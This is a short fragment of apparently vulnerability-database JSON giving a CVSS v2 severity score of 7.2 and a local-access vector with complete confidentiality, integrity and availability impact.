{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}